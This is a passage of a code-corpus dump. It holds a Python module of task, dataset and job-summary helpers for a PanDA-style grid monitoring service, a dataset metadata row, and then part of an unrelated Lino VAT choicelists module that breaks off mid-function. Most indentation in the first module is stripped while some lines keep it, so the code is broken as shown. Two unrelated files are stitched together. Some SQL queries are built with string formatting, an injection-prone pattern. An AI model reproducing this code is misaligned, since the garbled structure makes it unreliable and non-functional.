'storagetoken', 'nevents', 'neventsused', 'neventstobeused', 'nfiles', 'nfilesfinished', 'nfilesfailed'
)
dsets.extend(JediDatasets.objects.filter(**dsquery).values(*values))
scope = ''
newdslist = []
if len(dsets) > 0:
for ds in dsets:
if len(ds['datasetname']) > 0:
if not str(ds['datasetname']).startswith('user'):
scope = str(ds['datasetname']).split('.')[0]
else:
scope = '.'.join(str(ds['datasetname']).split('.')[:2])
if ':' in scope:
scope = str(scope).split(':')[0]
ds['scope'] = scope
newdslist.append(ds)
# input primary datasets
if ds['type'] in ['input', 'pseudo_input'] and ds['masterid'] is None:
                if ds['nevents'] is not None and int(ds['nevents']) > 0:
                    dsinfo['neventsTot'] += int(ds['nevents'])
                if ds['neventsused'] is not None and int(ds['neventsused']) > 0:
dsinfo['neventsUsedTot'] += int(ds['neventsused'])
if int(ds['nfiles']) > 0:
ds['percentfinished'] = int(100. * int(ds['nfilesfinished']) / int(ds['nfiles']))
dsinfo['nfiles'] += int(ds['nfiles'])
dsinfo['nfilesfinished'] += int(ds['nfilesfinished'])
dsinfo['nfilesfailed'] += int(ds['nfilesfailed'])
elif ds['type'] in ('output', ):
dsinfo['neventsOutput'] += int(ds['nevents']) if ds['nevents'] and ds['nevents'] > 0 else 0
dsets = newdslist
dsets = sorted(dsets, key=lambda x: x['datasetname'].lower())
dsinfo['pctfinished'] = round(100.*dsinfo['nfilesfinished']/dsinfo['nfiles'], 2) if dsinfo['nfiles'] > 0 else 0
dsinfo['pctfailed'] = round(100.*dsinfo['nfilesfailed']/dsinfo['nfiles'], 2) if dsinfo['nfiles'] > 0 else 0
return dsets, dsinfo
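# Illustration (an addition, not used in production): replicates the scope
# derivation in datasets_for_task() above; the dataset names are made up.
def _demo_dataset_scope(datasetname):
    """
    >>> _demo_dataset_scope('mc16_13TeV.361108.simul.HITS')
    'mc16_13TeV'
    >>> _demo_dataset_scope('user.jdoe.361108.mytask.out')
    'user.jdoe'
    """
    if not datasetname.startswith('user'):
        scope = datasetname.split('.')[0]
    else:
        scope = '.'.join(datasetname.split('.')[:2])
    if ':' in scope:
        scope = scope.split(':')[0]
    return scope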
def input_summary_for_task(taskrec, dsets):
"""
The function returns:
Input event chunks list for separate table
Input event chunks summary by states
A dictionary with tk as key and list of input files IDs that is needed for jobList view filter
"""
jeditaskid = taskrec['jeditaskid']
# Getting statuses of inputfiles
if datetime.strptime(taskrec['creationdate'], defaultDatetimeFormat) < \
datetime.strptime('2018-10-22 10:00:00', defaultDatetimeFormat):
ifsquery = """
select
ifs.jeditaskid,
ifs.datasetid,
ifs.fileid,
ifs.lfn,
ifs.startevent,
ifs.endevent,
ifs.attemptnr,
ifs.maxattempt,
ifs.failedattempt,
ifs.maxfailure,
case when cstatus not in ('running') then cstatus
when cstatus in ('running') and esmergestatus is null then cstatus
when cstatus in ('running') and esmergestatus = 'esmerge_transferring' then 'transferring'
when cstatus in ('running') and esmergestatus = 'esmerge_merging' then 'merging'
end as status
from (
select jdcf.jeditaskid, jdcf.datasetid, jdcf.fileid, jdcf.lfn, jdcf.startevent, jdcf.endevent,
jdcf.attemptnr, jdcf.maxattempt, jdcf.failedattempt, jdcf.maxfailure, jdcf.cstatus, f.esmergestatus, count(f.esmergestatus) as n
from
(select jd.jeditaskid, jd.datasetid, jdc.fileid,
jdc.lfn, jdc.startevent, jdc.endevent,
jdc.attemptnr, jdc.maxattempt, jdc.failedattempt, jdc.maxfailure,
case when (jdc.maxattempt <= jdc.attemptnr or jdc.failedattempt >= jdc.maxfailure) and jdc.status = 'ready' then 'failed' else jdc.status end as cstatus
from atlas_panda.jedi_dataset_contents jdc,
atlas_panda.jedi_datasets jd
where jd.datasetid = jdc.datasetid
and jd.jeditaskid = {}
and jd.masterid is NULL
and jdc.type in ( 'input', 'pseudo_input')
) jdcf
LEFT JOIN
(select f4.jeditaskid, f4.fileid, f4.datasetid, f4.pandaid,
case when ja4.jobstatus = 'transferring' and ja4.eventservice = 2 then 'esmerge_transferring' when ja4.eventservice = 2 then 'esmerge_merging' else null end as esmergestatus
from atlas_panda.filestable4 f4, ATLAS_PANDA.jobsactive4 ja4
where f4.pandaid = ja4.pandaid and f4.type in ( 'input', 'pseudo_input')
and f4.jeditaskid = {}
) f
on jdcf.datasetid = f.datasetid and jdcf.fileid = f.fileid
group by jdcf.jeditaskid, jdcf.datasetid, jdcf.fileid, jdcf.lfn, jdcf.startevent, jdcf.endevent,
jdcf.attemptnr, jdcf.maxattempt, jdcf.failedattempt, jdcf.maxfailure, jdcf.cstatus, f.esmergestatus
) ifs """.format(jeditaskid, jeditaskid)
cur = connection.cursor()
cur.execute(ifsquery)
inputfiles = cur.fetchall()
cur.close()
inputfiles_names = ['jeditaskid', 'datasetid', 'fileid', 'lfn', 'startevent', 'endevent', 'attemptnr',
'maxattempt', 'failedattempt', 'maxfailure', 'procstatus']
inputfiles_list = [dict(zip(inputfiles_names, row)) for row in inputfiles]
else:
ifsquery = {}
ifsquery['jeditaskid'] = jeditaskid
indsids = [ds['datasetid'] for ds in dsets if ds['type'] == 'input' and ds['masterid'] is None]
ifsquery['datasetid__in'] = indsids if len(indsids) > 0 else [-1,]
inputfiles_list = []
inputfiles_list.extend(JediDatasetContents.objects.filter(**ifsquery).values())
# counting of files in different states and building list of fileids for jobList
inputfiles_counts = {}
inputfilesids_states = {}
dsids = []
for inputfile in inputfiles_list:
if inputfile['procstatus'] not in inputfiles_counts:
inputfiles_counts[inputfile['procstatus']] = 0
if inputfile['procstatus'] not in inputfilesids_states:
inputfilesids_states[inputfile['procstatus']] = []
if inputfile['datasetid'] not in dsids:
dsids.append(inputfile['datasetid'])
inputfiles_counts[inputfile['procstatus']] += 1
inputfilesids_states[inputfile['procstatus']].append(inputfile['fileid'])
inputfiles_tk = {}
ifs_states = ['ready', 'queued', 'running', 'merging', 'transferring', 'finished', 'failed']
ifs_summary = []
for ifstate in ifs_states:
ifstatecount = 0
tk = random.randrange(100000000)
        if ifstate in inputfiles_counts:
ifstatecount = inputfiles_counts[ifstate]
inputfiles_tk[tk] = inputfilesids_states[ifstate]
ifs_summary.append({'name': ifstate, 'count': ifstatecount, 'tk': tk, 'ds': dsids})
return inputfiles_list, ifs_summary, inputfiles_tk
def job_summary_for_task_light(taskrec):
"""
Light version of jobSummary for ES tasks specifically. Nodrop mode by default. See ATLASPANDA-466 for details.
:param taskrec:
:return:
"""
jeditaskidstr = str(taskrec['jeditaskid'])
statelistlight = ['defined', 'assigned', 'activated', 'starting', 'running', 'holding', 'transferring', 'finished',
'failed', 'cancelled']
estypes = ['es', 'esmerge', 'jumbo', 'unknown']
# create structure and fill the dicts by 0 values
jobSummaryLight = {}
jobSummaryLightSplitted = {}
for state in statelistlight:
jobSummaryLight[str(state)] = 0
for estype in estypes:
jobSummaryLightSplitted[estype] = {}
for state in statelistlight:
jobSummaryLightSplitted[estype][str(state)] = 0
js_count_list = []
# decide which tables to query, if -1: only atlarc, 1: adcr, 0: both
task_archive_flag = get_task_time_archive_flag(get_task_timewindow(taskrec, format_out='datatime'))
if task_archive_flag >= 0:
jsquery = """
select jobstatus, case eventservice when 1 then 'es' when 5 then 'es' when 2 then 'esmerge' when 4 then 'jumbo' else 'unknown' end, count(pandaid) as njobs from (
(
select pandaid, es as eventservice, jobstatus from atlas_pandabigmon.combined_wait_act_def_arch4 where jeditaskid = :jtid
)
union all
(
select pandaid, eventservice, jobstatus from atlas_pandaarch.jobsarchived where jeditaskid = :jtid
minus
select pandaid, eventservice, jobstatus from atlas_pandaarch.jobsarchived where jeditaskid = :jtid and pandaid in (
select pandaid from atlas_pandabigmon.combined_wait_act_def_arch4 where jeditaskid = :jtid
)
)
)
group by jobstatus, eventservice
"""
cur = connection.cursor()
cur.execute(jsquery, {'jtid': jeditaskidstr})
js_count = cur.fetchall()
cur.close()
js_count_names = ['state', 'es', 'count']
js_count_list = [dict(zip(js_count_names, row)) for row in js_count]
# if old task go to ATLARC for jobs summary
if task_archive_flag <= 0:
js_count_raw_list = []
jquery = {
'jeditaskid': taskrec['jeditaskid'],
'modificationtime__castdate__range': get_task_timewindow(taskrec, format_out='str')
}
jobsarchived_models = get_pandajob_models_by_year(get_task_timewindow(taskrec, format_out='str'))
if len(jobsarchived_models) > 0:
for jam in jobsarchived_models:
js_count_raw_list.extend(jam.objects.filter(**jquery).values('eventservice', 'jobstatus').annotate(count=Count('pandaid')))
_logger.info("Got jobs summary from ATLARC")
if len(js_count_raw_list) > 0:
for row in js_count_raw_list:
tmp_dict = {
'state': row['jobstatus'],
'count': row['count'],
}
if row['eventservice']:
tmp_dict['es'] = const.EVENT_SERVICE_JOB_TYPES[row['eventservice']] if row['eventservice'] in const.EVENT_SERVICE_JOB_TYPES else 'unknown'
else:
tmp_dict['es'] = 'unknown'
js_count_list.append(tmp_dict)
for row in js_count_list:
if row['state'] in statelistlight:
if not (row['state'] == 'cancelled' and row['es'] in ('es', 'esmerge')):
jobSummaryLight[row['state']] += row['count']
if row['es'] in estypes and not (row['state'] == 'cancelled' and row['es'] in ('es', 'esmerge')):
jobSummaryLightSplitted[row['es']][row['state']] += row['count']
# delete 'unknown' if count = 0
if 'unknown' in jobSummaryLightSplitted and sum(v for v in jobSummaryLightSplitted['unknown'].values()) == 0:
try:
del jobSummaryLightSplitted['unknown']
        except KeyError:
_logger.warning("Failed to delete empty unknown category in jobSummaryLightSplitted")
# dict -> list for template
jobsummarylight = [dict(name=state, count=jobSummaryLight[state]) for state in statelistlight]
jobsummarylightsplitted = {}
for estype, count_dict in jobSummaryLightSplitted.items():
jobsummarylightsplitted[estype] = [dict(name=state, count=count_dict[state]) for state in statelistlight]
return jobsummarylight, jobsummarylightsplitted
def get_top_memory_consumers(taskrec):
jeditaskidstr = str(taskrec['jeditaskid'])
topmemoryconsumedjobs = []
tmcquerystr = """
select jeditaskid, pandaid, computingsite, jobmaxpss, jobmaxpss_percore, sitemaxrss, sitemaxrss_percore, maxpssratio
from (
select j.jeditaskid, j.pandaid, j.computingsite, j.jobmaxpss, j.jobmaxpss_percore, s.maxrss as sitemaxrss,
s.maxrss/s.corecount as sitemaxrss_percore, j.jobmaxpss_percore/(s.maxrss/s.corecount) as maxpssratio,
row_number() over (partition by jeditaskid order by j.jobmaxpss_percore/(s.maxrss/s.corecount) desc) as jobrank
from atlas_pandameta.schedconfig s,
(select pandaid, jeditaskid, computingsite, maxpss/1000 as jobmaxpss, maxpss/1000/actualcorecount as jobmaxpss_percore
from ATLAS_PANDA.jobsarchived4
where jeditaskid = :jdtsid and maxrss is not null
union
select pandaid, jeditaskid, computingsite, maxpss/1000 as jobmaxpss, maxpss/1000/actualcorecount as jobmaxpss_percore
from ATLAS_PANDAARCH.jobsarchived
where jeditaskid = :jdtsid and maxrss is not null
) j
where j.computingsite = s.nickname
)
where jobrank <= 3
"""
try:
cur = connection.cursor()
cur.execute(tmcquerystr, {'jdtsid': jeditaskidstr})
tmc_list = cur.fetchall()
cur.close()
    except Exception:
tmc_list = []
    # n.b. the SQL aliases the columns as jobmaxpss/maxpssratio; they are keyed
    # here as jobmaxrss/maxrssratio, presumably the names expected downstream
    tmc_names = ['jeditaskid', 'pandaid', 'computingsite', 'jobmaxrss', 'jobmaxpss_percore',
                 'sitemaxrss', 'sitemaxrss_percore', 'maxrssratio']
topmemoryconsumedjobs = [dict(zip(tmc_names, row)) for row in tmc_list]
for row in topmemoryconsumedjobs:
try:
row['maxrssratio'] = int(row['maxrssratio'])
        except (TypeError, ValueError):
row['maxrssratio'] = 0
row['jobmaxpss_percore'] = round(row['jobmaxpss_percore']) if row['jobmaxpss_percore'] else 0
row['sitemaxrss_percore'] = round(row['sitemaxrss_percore']) if row['sitemaxrss_percore'] else 0
return topmemoryconsumedjobs
def get_job_state_summary_for_tasklist(tasks):
"""
    Get the job state summary for a list of tasks. Nodrop mode only.
:return: taskJobStateSummary : dictionary
"""
taskids = [int(task['jeditaskid']) for task in tasks]
trans_key = insert_to_temp_table(taskids)
tmp_table = get_tmp_table_name()
jsquery = """
select jeditaskid, jobstatus, count(pandaid) as njobs from (
(
select jeditaskid, pandaid, jobstatus from atlas_pandabigmon.combined_wait_act_def_arch4
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
)
union all
(
select jeditaskid, pandaid, jobstatus from atlas_pandaarch.jobsarchived
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
minus
select jeditaskid, pandaid, jobstatus from atlas_pandaarch.jobsarchived
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
and pandaid in (
select pandaid from atlas_pandabigmon.combined_wait_act_def_arch4
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
)
)
)
group by jeditaskid, jobstatus
""".format(tmp_table)
cur = connection.cursor()
cur.execute(jsquery, {'tk': trans_key})
js_count_bytask = cur.fetchall()
cur.close()
js_count_bytask_names = ['jeditaskid', 'jobstatus', 'count']
js_count_bytask_list = [dict(zip(js_count_bytask_names, row)) for row in js_count_bytask]
# list -> dict
js_count_bytask_dict = {}
for row in js_count_bytask_list:
if row['jeditaskid'] not in js_count_bytask_dict:
js_count_bytask_dict[row['jeditaskid']] = {}
if row['jobstatus'] not in js_count_bytask_dict[row['jeditaskid']]:
js_count_bytask_dict[row['jeditaskid']][row['jobstatus']] = 0
js_count_bytask_dict[row['jeditaskid']][row['jobstatus']] += int(row['count'])
return js_count_bytask_dict
def get_task_params(jeditaskid):
"""
Extract task and job parameter lists from CLOB in Jedi_TaskParams table
:param jeditaskid: int
:return: taskparams: dict
:return: jobparams: list
"""
query = {'jeditaskid': jeditaskid}
taskparams = JediTaskparams.objects.filter(**query).values()
if len(taskparams) > 0:
taskparams = taskparams[0]['taskparams']
try:
taskparams = json.loads(taskparams)
except ValueError:
pass
return taskparams
def humanize_task_params(taskparams):
"""
Prepare list of params for template output
:param taskparams: dict
:return: taskparams_list, jobparams_list
"""
taskparams_list = []
jobparams_list = []
for k in taskparams:
rec = {'name': k, 'value': taskparams[k]}
taskparams_list.append(rec)
taskparams_list = sorted(taskparams_list, key=lambda x: x['name'].lower())
jobparams = taskparams['jobParameters']
if 'log' in taskparams:
jobparams.append(taskparams['log'])
for p in jobparams:
if p['type'] == 'constant':
ptxt = p['value']
elif p['type'] == 'template':
ptxt = "<i>{} template:</i> value='{}' ".format(p['param_type'], p['value'])
for v in p:
if v in ['type', 'param_type', 'value']:
continue
ptxt += " {}='{}'".format(v, p[v])
else:
ptxt = '<i>unknown parameter type {}:</i> '.format(p['type'])
for v in p:
if v in ['type', ]:
continue
ptxt += " {}='{}'".format(v, p[v])
jobparams_list.append(ptxt)
jobparams_list = sorted(jobparams_list, key=lambda x: x.lower())
return taskparams_list, jobparams_list
def get_hs06s_summary_for_task(query):
""""""
hs06sSum = {'finished': 0, 'failed': 0, 'total': 0}
hquery = copy.deepcopy(query)
hquery['jobstatus__in'] = ('finished', 'failed')
if 'jeditaskid' in hquery:
hs06sec_sum = []
pj_models = get_pandajob_models_by_year(query['modificationtime__castdate__range'])
for pjm in pj_models:
hs06sec_sum.extend(pjm.objects.filter(**hquery).values('jobstatus').annotate(hs06secsum=Sum('hs06sec')))
if len(hs06sec_sum) > 0:
for hs in hs06sec_sum:
if hs['jobstatus'] == 'finished':
hs06sSum['finished'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
hs06sSum['total'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
elif hs['jobstatus'] == 'failed':
hs06sSum['failed'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
hs06sSum['total'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
return hs06sSum
def get_task_age(task):
"""
    :param task: dict of task params, creationdate is obligatory
:return: age in days or -1 if not enough data provided
"""
task_age = -1
if 'endtime' in task and task['endtime'] is not None:
endtime = parse_datetime(task['endtime']) if not isinstance(task['endtime'], datetime) else task['endtime']
else:
endtime = datetime.now()
if 'creationdate' in task and task['creationdate'] is not None:
creationtime = parse_datetime(task['creationdate']) if not isinstance(task['creationdate'], datetime) else task['creationdate']
else:
creationtime = None
if endtime and creationtime:
task_age = round((endtime-creationtime).total_seconds() / 60. / 60. / 24., 2)
return task_age
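# Worked example (added comment, not original code): for creationdate
# 2021-01-01 00:00 and endtime 2021-01-03 12:00 the difference is 216000
# seconds, so get_task_age returns round(216000 / 60. / 60. / 24., 2) == 2.5 days.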
def get_task_timewindow(task, **kwargs):
"""
    Return a list of two datetimes bounding when the task ran
:param task:
:return: timewindow: list of datetime or str
"""
format_out = 'datetime'
if 'format_out' in kwargs and kwargs['format_out'] == 'str':
format_out = 'str'
timewindow = [datetime.now(), datetime.now()]
if 'creationdate' in task and task['creationdate']:
timewindow[0] = task['creationdate'] if isinstance(task['creationdate'], datetime) else parse_datetime(task['creationdate'])
else:
timewindow[0] = datetime.now()
if task['status'] in const.TASK_STATES_FINAL:
if 'endtime' in task and task['endtime']:
timewindow[1] = task['endtime'] if isinstance(task['endtime'], datetime) else parse_datetime(task['endtime'])
elif 'modificationtime' in task and task['modificationtime']:
timewindow[1] = task['modificationtime'] if isinstance(task['modificationtime'], datetime) else parse_datetime(task['modificationtime'])
else:
timewindow[1] = datetime.now()
else:
timewindow[1] = datetime.now()
if format_out == 'str':
timewindow = [t.strftime(defaultDatetimeFormat) for t in timewindow]
return timewindow
def get_task_time_archive_flag(task_timewindow):
"""
    Decide which tables to query: -1 means only atlarc, 1 means adcr, 0 means both
    :param task_timewindow: list of two datetime
    :return: task_age_flag: -1, 0 or 1
    """
task_age_flag = 1
if task_timewindow[1] < datetime.now() - timedelta(days=365*3):
task_age_flag = -1
elif task_timewindow[0] > datetime.now() - timedelta(days=365*3) and task_timewindow[1] < datetime.now() - timedelta(days=365*2):
task_age_flag = 0
elif task_timewindow[0] > datetime.now() - timedelta(days=365*2):
task_age_flag = 1
return task_age_flag
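# Illustration of the flag semantics above (added comment, not original code):
# a task whose window ended more than 3 years ago maps to -1 (ATLARC only),
# one that started within the last 2 years maps to 1 (ADCR only), and a task
# started within 3 years but finished more than 2 years ago maps to 0 (both).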
def get_dataset_locality(jeditaskid):
"""
    Get RSEs for a task's input datasets
:return:
"""
N_IN_MAX = 100
query = {}
extra_str = ' (1=1) '
    if isinstance(jeditaskid, (list, tuple)):
if len(jeditaskid) > N_IN_MAX:
trans_key = insert_to_temp_table(jeditaskid)
tmp_table = get_tmp_table_name()
            extra_str += ' AND jeditaskid IN (SELECT id FROM {} WHERE transactionkey = {} )'.format(tmp_table, trans_key)
else:
query['jeditaskid__in'] = jeditaskid
elif isinstance(jeditaskid, int):
query['jeditaskid'] = jeditaskid
rse_list = JediDatasetLocality.objects.filter(**query).extra(where=[extra_str]).values()
rse_dict = {}
if len(rse_list) > 0:
for item in rse_list:
if item['jeditaskid'] not in rse_dict:
rse_dict[item['jeditaskid']] = {}
if item['datasetid'] not in rse_dict[item['jeditaskid']]:
rse_dict[item['jeditaskid']][item['datasetid']] = []
rse_dict[item['jeditaskid']][item['datasetid']].append({'rse': item['rse'], 'timestamp': item['timestamp']})
return rse_dict
def get_prod_slice_by_taskid(jeditaskid):
jsquery = """
SELECT tasks.taskid, tasks.PR_ID, tasks.STEP_ID, datasets.SLICE from ATLAS_DEFT.T_PRODUCTION_TASK tasks
JOIN ATLAS_DEFT.T_PRODUCTION_STEP steps on tasks.step_id = steps.step_id
JOIN ATLAS_DEFT.T_INPUT_DATASET datasets ON datasets.IND_ID=steps.IND_ID
where tasks.taskid=:taskid
"""
cur = connection.cursor()
cur.execute(jsquery, {'taskid': jeditaskid})
task_prod_info = cur.fetchall()
cur.close()
slice = None
if task_prod_info:
slice = task_prod_info[0][3]
return slice
def get_logs_by_taskid(jeditaskid):
tasks_logs = []
    connection = create_esatlas_connection()
    # both the jedi and panda log indices are aggregated the same way
    for es_index in ('atlas_jedilogs-*', 'atlas_pandalogs-*'):
        s = Search(using=connection, index=es_index)
        s = s.filter('term', **{'jediTaskID': jeditaskid})
        s.aggs.bucket('logName', 'terms', field='logName.keyword', size=1000) \
            .bucket('type', 'terms', field='fields.type.keyword') \
            .bucket('logLevel', 'terms', field='logLevel.keyword')
        response = s.execute()
        for agg in response['aggregations']['logName']['buckets']:
            for types in agg['type']['buckets']:
                log_name = types['key']
                for levelnames in types['logLevel']['buckets']:
                    levelname = levelnames['key']
                    tasks_logs.append({'jediTaskID': jeditaskid, 'logname': log_name, 'loglevel': levelname,
                                       'lcount': str(levelnames['doc_count'])})
return tasks_logs
|
apache-2.0
| 1,436,448,402,228,913,000 | 42.802091 | 193 | 0.579949 | false |
lino-framework/xl
|
lino_xl/lib/vat/choicelists.py
|
1
|
17924
|
# -*- coding: UTF-8 -*-
# Copyright 2012-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
from lino.utils import is_string
from decimal import Decimal
from lino.api import dd, _, gettext
from etgen.html import E, forcetext
from django.db import models
from lino_xl.lib.ledger.roles import LedgerStaff
from lino_xl.lib.ledger.choicelists import DC, TradeTypes, CommonAccounts
from lino_xl.lib.ledger.utils import ZERO
class VatClasses(dd.ChoiceList):
verbose_name = _("VAT class")
verbose_name_plural = _("VAT classes")
required_roles = dd.login_required(LedgerStaff)
show_values = False
add = VatClasses.add_item
add('010', _("Goods at normal VAT rate"), 'goods') # everything else
add('020', _("Goods at reduced VAT rate"), 'reduced') # food, books,...
add('030', _("Goods exempt from VAT"), 'exempt') # post stamps, ...
add('100', _("Services"), 'services')
add('200', _("Investments"), 'investments')
add('210', _("Real estate"), 'real_estate')
add('220', _("Vehicles"), 'vehicles')
add('300', _("Operations without VAT"), 'vatless') # internal clearings, flight tickets, ...
class VatAreas(dd.ChoiceList):
verbose_name = _("VAT area")
verbose_name_plural = _("VAT areas")
required_roles = dd.login_required(LedgerStaff)
@classmethod
def get_for_country(cls, country=None):
if country is None:
isocode = dd.plugins.countries.country_code
else:
isocode = country.isocode
if isocode == dd.plugins.countries.country_code:
return cls.national
if isocode in dd.plugins.vat.eu_country_codes:
return cls.eu
return cls.international
add = VatAreas.add_item
add('10', _("National"), 'national')
add('20', _("EU"), 'eu')
add('30', _("International"), 'international')
class VatColumn(dd.Choice):
common_account = None
def __init__(self, value, text, common_account=None):
super(VatColumn, self).__init__(value, text)
self.common_account = common_account
class VatColumns(dd.ChoiceList):
# to be populated by bevat, bevats, ...
verbose_name = _("VAT column")
verbose_name_plural = _("VAT columns")
required_roles = dd.login_required(LedgerStaff)
show_values = True
item_class = VatColumn
column_names = "value text common_account account"
@dd.virtualfield(CommonAccounts.field())
def common_account(cls, col, ar):
return col.common_account
@dd.virtualfield(dd.ForeignKey('ledger.Account'))
def account(cls, col, ar):
if col.common_account is not None:
return col.common_account.get_object()
class VatRegime(dd.Choice):
vat_area = None
needs_vat_id = False
# item_vat = True # 20200521 no longer used
def __init__(self, value, text, name, vat_area=None, item_vat=True, needs_vat_id=False):
super(VatRegime, self).__init__(value, text, name)
self.vat_area = vat_area
self.needs_vat_id = needs_vat_id
# self.item_vat = item_vat
def is_allowed_for(self, vat_area):
if self.vat_area is None:
return True
return self.vat_area == vat_area
class VatRegimes(dd.ChoiceList):
verbose_name = _("VAT regime")
verbose_name_plural = _("VAT regimes")
column_names = "value name text vat_area needs_vat_id #item_vat"
item_class = VatRegime
required_roles = dd.login_required(LedgerStaff)
@dd.virtualfield(VatAreas.field())
def vat_area(cls, regime, ar):
return regime.vat_area
# @dd.virtualfield(dd.BooleanField(_("item VAT")))
# def item_vat(cls, regime, ar):
# return regime.item_vat
@dd.virtualfield(dd.BooleanField(_("Needs VAT id")))
def needs_vat_id(cls, regime, ar):
return regime.needs_vat_id
add = VatRegimes.add_item
add('10', _("Normal"), 'normal')
# re-populated in bevat and bevats.
# See also lino_xl.lib.vat.Plugin.default_vat_regime
#
class DeclarationField(dd.Choice):
editable = False
vat_regimes = None
exclude_vat_regimes = None
vat_classes = None
exclude_vat_classes = None
vat_columns = None
exclude_vat_columns = None
is_payable = False
# value dc vat_columns text fieldnames both_dc vat_regimes vat_classes
def __init__(self, value, dc,
vat_columns=None,
# is_base,
text=None,
fieldnames='',
both_dc=True,
vat_regimes=None, vat_classes=None,
**kwargs):
name = "F" + value
# text = string_concat("[{}] ".format(value), text)
self.help_text = text
super(DeclarationField, self).__init__(
value, "[{}]".format(value), name, **kwargs)
# self.is_base = is_base
self.fieldnames = fieldnames
self.vat_regimes = vat_regimes
self.vat_classes = vat_classes
self.vat_columns = vat_columns
self.dc = dc
self.both_dc = both_dc
def attach(self, choicelist):
self.minus_observed_fields = set()
self.observed_fields = []
for n in self.fieldnames.split():
if n.startswith('-'):
n = n[1:]
self.minus_observed_fields.add(n)
f = choicelist.get_by_value(n)
if f is None:
raise Exception(
"Invalid observed field {} for {}".format(n, self))
self.observed_fields.append(f)
if is_string(self.vat_regimes):
vat_regimes = self.vat_regimes
self.vat_regimes = set()
self.exclude_vat_regimes = set()
for n in vat_regimes.split():
if n.startswith('!'):
s = self.exclude_vat_regimes
n = n[1:]
else:
s = self.vat_regimes
v = VatRegimes.get_by_name(n)
if v is None:
raise Exception(
"Invalid VAT regime {} for field {}".format(
v, self.value))
s.add(v)
if len(self.vat_regimes) == 0:
self.vat_regimes = None
if len(self.exclude_vat_regimes) == 0:
self.exclude_vat_regimes = None
if is_string(self.vat_classes):
vat_classes = self.vat_classes
self.vat_classes = set()
self.exclude_vat_classes = set()
for n in vat_classes.split():
if n.startswith('!'):
s = self.exclude_vat_classes
n = n[1:]
else:
s = self.vat_classes
v = VatClasses.get_by_name(n)
if v is None:
raise Exception(
"Invalid VAT class {} for field {}".format(
v, self.value))
s.add(v)
if len(self.vat_classes) == 0:
self.vat_classes = None
if len(self.exclude_vat_classes) == 0:
self.exclude_vat_classes = None
# using VAT columns as selector is probably obsolete
if is_string(self.vat_columns):
vat_columns = self.vat_columns
self.vat_columns = set()
self.exclude_vat_columns = set()
for n in vat_columns.split():
if n.startswith('!'):
s = self.exclude_vat_columns
n = n[1:]
else:
s = self.vat_columns
v = VatColumns.get_by_value(n)
if v is None:
raise Exception(
"Invalid VAT column {} for field {}".format(
n, self.value))
s.add(v)
if len(self.vat_columns) == 0:
self.vat_columns = None
if len(self.exclude_vat_columns) == 0:
self.exclude_vat_columns = None
super(DeclarationField, self).attach(choicelist)
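    # Note on the spec syntax parsed in attach() (explanatory comment, added):
    # the selectors accept space-separated names where a leading "!" excludes,
    # e.g. vat_classes="goods !services" keeps movements whose VAT class is
    # `goods` and never `services`; empty include/exclude sets collapse to
    # None, meaning "no restriction".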
def get_model_field(self):
return dd.PriceField(
self.text, default=Decimal, editable=self.editable,
help_text=self.help_text)
# def __str__(self):
# # return force_str(self.text, errors="replace")
# # return self.text
# return "[{}] {}".format(self.value, self.text)
def collect_from_movement(self, dcl, mvt, field_values, payable_sums):
pass
def collect_from_sums(self, dcl, sums, payable_sums):
pass
class SumDeclarationField(DeclarationField):
def __init__(self, *args, **kwargs):
super(SumDeclarationField, self).__init__(*args, **kwargs)
if self.is_payable:
raise Exception("SumDeclarationField may not be payable")
def collect_from_sums(self, dcl, field_values, payable_sums):
tot = Decimal()
for f in self.observed_fields:
v = field_values[f.name]
if f.value in self.minus_observed_fields:
v = -v
tot += v
# if f.dc == self.dc:
# tot += v
# else:
# tot -= v
field_values[self.name] = tot
class WritableDeclarationField(DeclarationField):
editable = True
def collect_from_sums(self, dcl, field_values, payable_sums):
if self.is_payable:
amount = field_values[self.name]
if amount:
if self.dc == dcl.journal.dc:
amount = - amount
k = ((dcl.journal.account, None), None, None, None)
payable_sums.collect(k, amount)
class MvtDeclarationField(DeclarationField):
def collect_from_movement(self, dcl, mvt, field_values, payable_sums):
# if not mvt.account.declaration_field in self.observed_fields:
# return 0
if self.vat_classes is not None:
            if mvt.vat_class not in self.vat_classes:
return
if self.exclude_vat_classes is not None:
if mvt.vat_class in self.exclude_vat_classes:
return
if self.vat_columns is not None:
            if mvt.account.vat_column not in self.vat_columns:
return
if self.exclude_vat_columns is not None:
if mvt.account.vat_column in self.exclude_vat_columns:
return
if self.vat_regimes is not None:
            if mvt.vat_regime not in self.vat_regimes:
return
if self.exclude_vat_regimes is not None:
if mvt.vat_regime in self.exclude_vat_regimes:
return
amount = mvt.amount
if not amount:
return
if self.dc == DC.debit:
amount = -amount
if amount < 0 and not self.both_dc:
return
field_values[self.name] += amount
if self.is_payable:
if self.dc == dcl.journal.dc:
amount = - amount
# k = ((mvt.account, None), mvt.project, mvt.vat_class, mvt.vat_regime)
k = ((mvt.account, None), None, None, None)
payable_sums.collect(k, amount)
# k = (dcl.journal.account, None, None, None)
# payable_sums.collect(k, amount)
# class AccountDeclarationField(MvtDeclarationField):
# pass
# def __init__(self, value, dc, vat_columns, *args, **kwargs):
# # kwargs.update(fieldnames=value)
# kwargs.update(vat_columns=vat_columns)
# super(AccountDeclarationField, self).__init__(
# value, dc, *args, **kwargs)
class DeclarationFieldsBase(dd.ChoiceList):
verbose_name_plural = _("Declaration fields")
item_class = DeclarationField
column_names = "value name text description *"
# @classmethod
# def add_account_field(cls, *args, **kwargs):
# cls.add_item_instance(
# AccountDeclarationField(*args, **kwargs))
@classmethod
def add_mvt_field(cls, *args, **kwargs):
cls.add_item_instance(
MvtDeclarationField(*args, **kwargs))
@classmethod
def add_sum_field(cls, *args, **kwargs):
cls.add_item_instance(
SumDeclarationField(*args, **kwargs))
@classmethod
def add_writable_field(cls, *args, **kwargs):
cls.add_item_instance(
WritableDeclarationField(*args, **kwargs))
@dd.displayfield(_("Description"))
def description(cls, fld, ar):
if ar is None:
return ''
elems = [fld.help_text, E.br()]
def x(label, lst, xlst):
if lst is None:
spec = ''
else:
lst = sorted([i.name or i.value for i in lst])
